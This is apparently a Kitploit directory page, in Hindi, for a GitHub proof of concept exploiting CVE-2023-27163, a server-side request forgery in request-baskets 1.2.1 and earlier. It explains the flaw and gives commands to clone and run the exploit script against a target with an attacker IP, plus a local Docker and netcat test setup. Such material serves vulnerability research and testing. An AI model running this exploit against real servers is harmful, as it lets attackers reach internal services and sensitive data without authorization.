Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-27163 — request-baskets (V<= v.1.2.1) में सर्वर साइड रिक्वेस्ट फोर्जरी (SSRF) के लिए प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/mastercode112/cve-2023-27163
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubmastercode112/cve-2023-27163

CVE-2023-27163

request-baskets (V<= v.1.2.1) में सर्वर साइड रिक्वेस्ट फोर्जरी (SSRF) के लिए प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
212 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Request-Baskets पर SSRF का प्रूफ ऑफ कॉन्सेप्ट (CVE-2023-27163)

इस रिपॉज़िटरी में CVE-2023-27163 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शामिल है, जो request-baskets में संस्करण 1.2.1 तक पाई गई सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है। यह भेद्यता हमलावरों को एक क्राफ्टेड API अनुरोध के माध्यम से /api/baskets/{name} घटक का शोषण करके नेटवर्क संसाधनों और संवेदनशील जानकारी तक पहुँचने की अनुमति देती है।

उपयोग

root@kitploit:~
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>

यह कैसे काम करता है?

Request-baskets एक वेब एप्लिकेशन है जिसे किसी विशिष्ट रूट, जिसे basket कहा जाता है, पर अनुरोधों को एकत्र करने और पंजीकृत करने के लिए बनाया गया है। इसे बनाते समय, उपयोगकर्ता अनुरोध को आगे भेजने के लिए कोई अन्य सर्वर निर्दिष्ट कर सकता है। यहाँ समस्या यह है कि उपयोगकर्ता अनपेक्षित सेवाओं, जैसे नेटवर्क-क्लोज्ड एप्लिकेशन, को निर्दिष्ट कर सकता है।

उदाहरण के लिए: मान लीजिए कि सर्वर Request-baskets (पोर्ट 55555) और पोर्ट 8000 पर एक Flask वेब सर्वर होस्ट करता है। Flask भी केवल localhost के साथ इंटरैक्ट करने के लिए कॉन्फ़िगर किया गया है। एक ऐसा basket बनाकर जो http://localhost:8000 पर फॉरवर्ड करता है, हमलावर पहले से प्रतिबंधित Flask वेब सर्वर तक पहुँच सकता है।

लोकलहोस्ट में परीक्षण

PoC इमेज

  1. Request-Baskets का Docker कंटेनर प्रारंभ करें
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git

2. PoC डाउनलोड करें

```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
  1. कनेक्शन की प्रतीक्षा करें
root@kitploit:~
nc -lvp 8000
  1. Docker होस्ट का IP पता सहेजें
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. PoC चलाएँ
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
टूल डाउनलोड करें